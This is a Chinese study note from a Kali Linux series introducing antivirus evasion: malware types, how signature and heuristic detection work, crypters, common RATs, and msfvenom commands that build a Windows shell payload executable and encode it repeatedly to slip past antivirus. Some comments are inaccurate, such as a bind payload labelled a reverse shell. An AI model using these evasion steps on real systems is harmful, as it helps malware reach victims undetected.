Kali linux 学习笔记（八十一）免杀——简介 2020.4.20

学习笔记（八十一）免杀——简介 2020.4.20"/>

Kali linux 学习笔记（八十一）免杀——简介 2020.4.20

前言

本节开始学习免杀
免杀，避免被杀，使得恶意软件能进入目标机不被查杀

1、恶意软件

• 病毒、木马、蠕虫、键盘记录、僵尸程序、流氓软件、勒索软件、广告程序
• 在用户非自愿的情况下执行安装
• 出于某种恶意的目的：控制、窃取、勒索、偷窥、推送、攻击……

2、防病毒软件

恶意程序最主要的防护手段

• 称呼：杀毒软件/防病毒软件
• 功能：客户端/服务器/邮件防病毒

检测原理

• 基于二进制文件中特征签名的黑名单检测方法，这是最主要的方法
• 基于行为的分析方法（启发式）

事后手段

• 永远落后于病毒发展

3、免杀技术

修改二进制文件中的特征字符

• 知道黑名单里的特征
• 进行替换、擦除、修改

加密技术（crypter）

• 通过加密使得特征字符不可读，从而逃避AV 检测
• 运行时分片分段的解密执行，注入进程或 AV 不检查的无害文件中

防病毒软件的检测

• 既检查恶意程序本身的特征字符
• 也检查加密器 cripter 的特征字符

4、当前现状

恶意软件制造者

• 编写私有的 RAT 软件，避免普遍被 AV 所知的特征字符，使用独有 crypter 软件加密恶意程序，处事低调，尽量避免被发现
• 没有能力自己编写恶意代码的黑客，通过直接修改特征码的方式免杀
• Fully UnDetectable 是最高追求 （FUD）

AV 厂商

• 广泛采集样本，尽快发现出现的病毒程序，更新病毒库
• 一般新的恶意软件安全 UD 窗口期是一周左右
• 与恶意软件制造者永无休止的拉锯战
• 新的启发式检测技术尚有待完善(误杀漏杀)

一些在线站点
单一 AV 厂商的病毒库很难达到 100% 覆盖
这两个在线多引擎查杀网站与 AV 查杀共享信息

• /
  接口被某些国家的AV软禁免费利用，没有自己的病毒库
• /

这两个是搞黑的在线多引擎查毒站

• /
• /

常用的 RAT 软件

• 灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore

5、msf的一些例子

#生成反弹shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.1.119 lport=4444 -a x86 --platform win -f exe -o a.exe
#-p是payload，-a是系统架构，--platform是平台，-f是软件格式，-o是命名
#加密编码反弹shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.1.119 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b '\x00' -f exe -o b.exe
#-e指定加密模块，-i是加密次数，这里重复加密，-b是特殊字符过滤
#对比两者里面可读内容
string a.exe
string b.exe
#在上面的网站里查下这两个，大概能有50%查出